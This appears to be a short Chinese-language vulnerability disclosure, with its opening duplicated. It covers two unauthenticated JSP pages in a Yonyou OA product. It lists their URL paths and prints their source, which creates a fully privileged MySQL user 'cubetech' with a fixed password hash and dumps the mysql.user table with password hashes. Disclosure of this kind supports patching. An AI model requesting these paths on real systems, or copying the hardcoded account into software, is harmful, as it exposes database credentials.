<p>该漏洞泄露了数据库用户的账号,密码hash.<br><br></p><p>code 区域</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">/yyoa/createMysql.jsp<br style="margin: 0px; padding: 0px;"> /yyoa/ext/createMysql.jsp</code></pre><p><br><br>该文件的代码为:<br><br></p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);"><%@ page language="java" %><br style="margin: 0px; padding: 0px;"> <%@ page session="true" %><br style="margin: 0px; padding: 0px;"> <%@ page isThreadSafe="true" %><br style="margin: 0px; padding: 0px;"> <%@ page import="java.sql.*,net.btdz.oa.common.*" %><br style="margin: 0px; padding: 0px;"> <% <br style="margin: 0px; padding: 0px;"> CommonSql.exeUpdate("DELETE FROM mysql.user WHERE User = 'cubetech' ");<br style="margin: 0px; padding: 0px;">...
<p>该漏洞泄露了数据库用户的账号,密码hash.<br><br></p><p>code 区域</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">/yyoa/createMysql.jsp<br style="margin: 0px; padding: 0px;"> /yyoa/ext/createMysql.jsp</code></pre><p><br><br>该文件的代码为:<br><br></p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);"><%@ page language="java" %><br style="margin: 0px; padding: 0px;"> <%@ page session="true" %><br style="margin: 0px; padding: 0px;"> <%@ page isThreadSafe="true" %><br style="margin: 0px; padding: 0px;"> <%@ page import="java.sql.*,net.btdz.oa.common.*" %><br style="margin: 0px; padding: 0px;"> <% <br style="margin: 0px; padding: 0px;"> CommonSql.exeUpdate("DELETE FROM mysql.user WHERE User = 'cubetech' ");<br style="margin: 0px; padding: 0px;"> CommonSql.exeUpdate("INSERT INTO mysql.user VALUES ('localhost','cubetech','*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0,0);"); <br style="margin: 0px; padding: 0px;"> ResultSet rs = null;<br style="margin: 0px; padding: 0px;"> rs = CommonSql.exeQuery("Select * from mysql.user;");<br style="margin: 0px; padding: 0px;"> while(rs.next()){<br style="margin: 0px; padding: 0px;"> out.println(rs.getString(1)+"</br>");<br style="margin: 0px; padding: 0px;"> out.println(rs.getString(2)+"</br>");<br style="margin: 0px; padding: 0px;"> out.println(rs.getString(3)+"</br>");<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> %></code></pre><p><br><br>直接执行了Select * from mysql.user;并回显</p>
